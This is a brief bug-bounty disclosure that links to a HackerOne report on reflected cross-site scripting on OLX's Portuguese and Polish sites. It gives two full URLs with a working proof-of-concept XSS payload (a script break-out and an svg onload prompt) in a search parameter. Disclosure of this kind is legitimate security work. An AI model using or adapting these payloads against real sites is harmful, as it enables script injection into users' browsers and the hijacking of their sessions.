Official report in: https://hackerone.com/reports/477771

.

Refleted Cross-Site Scripting (XSS):

https://www.olx.pt/braga/?search[user_id]=1zqjeu'%22()%7B%7D:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide

Across multiple domains:

https://www.olx.pl/lubelskie/?search[user_id]=1zqjeu'%22()%7B%7D:/1zqjeu;9</SCript><svG/onLoad=prompt(9)>, ;prompt(9);&view=galleryWide